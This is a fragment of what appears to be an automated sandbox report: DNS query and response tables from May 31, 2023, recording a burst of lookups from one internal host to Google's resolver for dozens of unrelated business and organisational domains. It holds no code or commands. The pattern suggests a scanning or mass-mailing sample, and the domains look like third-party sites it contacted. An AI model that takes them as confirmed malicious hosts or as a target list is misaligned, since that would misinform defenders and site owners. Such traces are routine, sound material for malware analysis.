                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.113886118 CEST192.168.2.38.8.8.80xbffbStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.256889105 CEST192.168.2.38.8.8.80x8e5dStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.334450006 CEST192.168.2.38.8.8.80x1d95Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.391640902 CEST192.168.2.38.8.8.80x5276Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.393081903 CEST192.168.2.38.8.8.80x34e8Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.468980074 CEST192.168.2.38.8.8.80xe228Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.484961987 CEST192.168.2.38.8.8.80xc2ccStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.491036892 CEST192.168.2.38.8.8.80x726cStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.519933939 CEST192.168.2.38.8.8.80xab74Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.573185921 CEST192.168.2.38.8.8.80x5d57Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.606964111 CEST192.168.2.38.8.8.80x4e06Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.640903950 CEST192.168.2.38.8.8.80x4bd4Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.643708944 CEST192.168.2.38.8.8.80x984aStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.740788937 CEST192.168.2.38.8.8.80x90cStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:24.916143894 CEST192.168.2.38.8.8.80x8029Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:25.080394030 CEST192.168.2.38.8.8.80x95c7Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:25.327276945 CEST192.168.2.38.8.8.80xd1a1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:25.727390051 CEST192.168.2.38.8.8.80xa899Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:25.797538042 CEST192.168.2.38.8.8.80x2693Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:25.969743013 CEST192.168.2.38.8.8.80xc05dStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.154740095 CEST192.168.2.38.8.8.80xa608Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.362428904 CEST192.168.2.38.8.8.80x91f1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.412883997 CEST192.168.2.38.8.8.80x8a99Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.471543074 CEST192.168.2.38.8.8.80xd7a3Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.488111019 CEST192.168.2.38.8.8.80x414fStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.578130960 CEST192.168.2.38.8.8.80x2ff6Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.660562992 CEST192.168.2.38.8.8.80x1a53Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.687752008 CEST192.168.2.38.8.8.80x7e08Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.694411993 CEST192.168.2.38.8.8.80xbf89Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:26.718983889 CEST192.168.2.38.8.8.80xc98cStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:27.358500957 CEST192.168.2.38.8.8.80x91f1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:27.507019997 CEST192.168.2.38.8.8.80xbccaStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:27.755554914 CEST192.168.2.38.8.8.80x55b8Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:27.875886917 CEST192.168.2.38.8.8.80x5ce9Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.052642107 CEST192.168.2.38.8.8.80x246eStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.110845089 CEST192.168.2.38.8.8.80x524fStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.374154091 CEST192.168.2.38.8.8.80x91f1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.428172112 CEST192.168.2.38.8.8.80x1d6eStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.501370907 CEST192.168.2.38.8.8.80x5cecStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.519618034 CEST192.168.2.38.8.8.80xe119Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.838543892 CEST192.168.2.38.8.8.80x94eeStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:28.948240995 CEST192.168.2.38.8.8.80x52d5Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:29.305216074 CEST192.168.2.38.8.8.80x94e6Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:29.360320091 CEST192.168.2.38.8.8.80xd7d8Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:29.614212036 CEST192.168.2.38.8.8.80x52beStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:29.636768103 CEST192.168.2.38.8.8.80x5cbbStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:29.672899008 CEST192.168.2.38.8.8.80xf03dStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.001866102 CEST192.168.2.38.8.8.80x7db1Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.147615910 CEST192.168.2.38.8.8.80x88d9Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.270944118 CEST192.168.2.38.8.8.80x5f77Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.391442060 CEST192.168.2.38.8.8.80x91f1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.462337971 CEST192.168.2.38.8.8.80x5bb7Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:30.579229116 CEST192.168.2.38.8.8.80xb338Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:31.223788977 CEST192.168.2.38.8.8.80x196dStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:31.390723944 CEST192.168.2.38.8.8.80x9b3fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:31.890867949 CEST192.168.2.38.8.8.80x2f69Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:31.985347986 CEST192.168.2.38.8.8.80xa313Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:32.162631989 CEST192.168.2.38.8.8.80x474dStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:32.392313004 CEST192.168.2.38.8.8.80x9b3fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:32.619663954 CEST192.168.2.38.8.8.80x88aeStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:33.524563074 CEST192.168.2.38.8.8.80x9b3fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:33.735213041 CEST192.168.2.38.8.8.80xa8d0Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:33.832150936 CEST192.168.2.38.8.8.80x97f2Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:33.922700882 CEST192.168.2.38.8.8.80xbae6Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.028325081 CEST192.168.2.38.8.8.80xc35Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.212357998 CEST192.168.2.38.8.8.80xda2eStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.866410017 CEST192.168.2.38.8.8.80x7794Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.866410017 CEST192.168.2.38.8.8.80x9c82Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.867530107 CEST192.168.2.38.8.8.80xc420Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.869512081 CEST192.168.2.38.8.8.80x3931Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.892218113 CEST192.168.2.38.8.8.80x3909Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:34.911257029 CEST192.168.2.38.8.8.80x8c6Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.281177044 CEST8.8.8.8192.168.2.30x4c08No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.293018103 CEST8.8.8.8192.168.2.30xca6fName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.294840097 CEST8.8.8.8192.168.2.30xa3e3No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.294840097 CEST8.8.8.8192.168.2.30xa3e3No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.295651913 CEST8.8.8.8192.168.2.30xb590No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.295651913 CEST8.8.8.8192.168.2.30xb590No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.295825005 CEST8.8.8.8192.168.2.30xa2cfNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.295825005 CEST8.8.8.8192.168.2.30xa2cfNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.296511889 CEST8.8.8.8192.168.2.30x6e91No error (0)www.pdqhomes.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.296511889 CEST8.8.8.8192.168.2.30x6e91No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.296511889 CEST8.8.8.8192.168.2.30x6e91No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.296511889 CEST8.8.8.8192.168.2.30x6e91No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.301568031 CEST8.8.8.8192.168.2.30x52f1No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.301568031 CEST8.8.8.8192.168.2.30x52f1No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.331312895 CEST8.8.8.8192.168.2.30x63fdServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.520139933 CEST8.8.8.8192.168.2.30xf966No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.548723936 CEST8.8.8.8192.168.2.30xe241No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.548723936 CEST8.8.8.8192.168.2.30xe241No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.597476006 CEST8.8.8.8192.168.2.30x2633No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.597476006 CEST8.8.8.8192.168.2.30x2633No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.745102882 CEST8.8.8.8192.168.2.30x46baNo error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.745102882 CEST8.8.8.8192.168.2.30x46baNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.745102882 CEST8.8.8.8192.168.2.30x46baNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.780428886 CEST8.8.8.8192.168.2.30x9e9eNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.780428886 CEST8.8.8.8192.168.2.30x9e9eNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.780428886 CEST8.8.8.8192.168.2.30x9e9eNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.791806936 CEST8.8.8.8192.168.2.30x25bNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.791806936 CEST8.8.8.8192.168.2.30x25bNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.791806936 CEST8.8.8.8192.168.2.30x25bNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.983685017 CEST8.8.8.8192.168.2.30x1d60No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.984788895 CEST8.8.8.8192.168.2.30x669bNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.984788895 CEST8.8.8.8192.168.2.30x669bNo error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.992870092 CEST8.8.8.8192.168.2.30x6318No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.992870092 CEST8.8.8.8192.168.2.30x6318No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:56.992870092 CEST8.8.8.8192.168.2.30x6318No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.005492926 CEST8.8.8.8192.168.2.30xf2aNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.151005983 CEST8.8.8.8192.168.2.30xfd52No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.151005983 CEST8.8.8.8192.168.2.30xfd52No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.151005983 CEST8.8.8.8192.168.2.30xfd52No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.395719051 CEST8.8.8.8192.168.2.30xdb8dNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.395719051 CEST8.8.8.8192.168.2.30xdb8dNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.395719051 CEST8.8.8.8192.168.2.30xdb8dNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.400094032 CEST8.8.8.8192.168.2.30x3060No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.423777103 CEST8.8.8.8192.168.2.30x5bd2No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.423777103 CEST8.8.8.8192.168.2.30x5bd2No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.423777103 CEST8.8.8.8192.168.2.30x5bd2No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.444055080 CEST8.8.8.8192.168.2.30xef83No error (0)www.petsfan.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.444055080 CEST8.8.8.8192.168.2.30xef83No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.444055080 CEST8.8.8.8192.168.2.30xef83No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.444055080 CEST8.8.8.8192.168.2.30xef83No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.923799038 CEST8.8.8.8192.168.2.30x906eName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.937923908 CEST8.8.8.8192.168.2.30xfbafNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.937923908 CEST8.8.8.8192.168.2.30xfbafNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.938780069 CEST8.8.8.8192.168.2.30x70ecNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.938780069 CEST8.8.8.8192.168.2.30x70ecNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.968399048 CEST8.8.8.8192.168.2.30x6c18No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.968399048 CEST8.8.8.8192.168.2.30x6c18No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:57.968437910 CEST8.8.8.8192.168.2.30x76daNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.025573969 CEST8.8.8.8192.168.2.30xa76No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.025573969 CEST8.8.8.8192.168.2.30xa76No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.187455893 CEST8.8.8.8192.168.2.30x44d3No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.658216000 CEST8.8.8.8192.168.2.30x3235No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.658216000 CEST8.8.8.8192.168.2.30x3235No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.818646908 CEST8.8.8.8192.168.2.30x6b45No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.818646908 CEST8.8.8.8192.168.2.30x6b45No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.831671000 CEST8.8.8.8192.168.2.30xe2ddNo error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.831671000 CEST8.8.8.8192.168.2.30xe2ddNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.831671000 CEST8.8.8.8192.168.2.30xe2ddNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.831671000 CEST8.8.8.8192.168.2.30xe2ddNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.834443092 CEST8.8.8.8192.168.2.30x2d13No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.872818947 CEST8.8.8.8192.168.2.30xc257No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.872818947 CEST8.8.8.8192.168.2.30xc257No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:58.894561052 CEST8.8.8.8192.168.2.30x5189No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.069555998 CEST8.8.8.8192.168.2.30xdaa5No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.069555998 CEST8.8.8.8192.168.2.30xdaa5No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.128127098 CEST8.8.8.8192.168.2.30x67daNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.128127098 CEST8.8.8.8192.168.2.30x67daNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.374914885 CEST8.8.8.8192.168.2.30x7631No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.374914885 CEST8.8.8.8192.168.2.30x7631No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.375150919 CEST8.8.8.8192.168.2.30xfe54No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.375150919 CEST8.8.8.8192.168.2.30xfe54No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.377814054 CEST8.8.8.8192.168.2.30x7015No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:49:59.999546051 CEST8.8.8.8192.168.2.30xcae9No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.003405094 CEST8.8.8.8192.168.2.30xa5cbNo error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.003405094 CEST8.8.8.8192.168.2.30xa5cbNo error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.012856960 CEST8.8.8.8192.168.2.30xee4No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.064699888 CEST8.8.8.8192.168.2.30xbNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.064699888 CEST8.8.8.8192.168.2.30xbNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.066776037 CEST8.8.8.8192.168.2.30x9da5No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
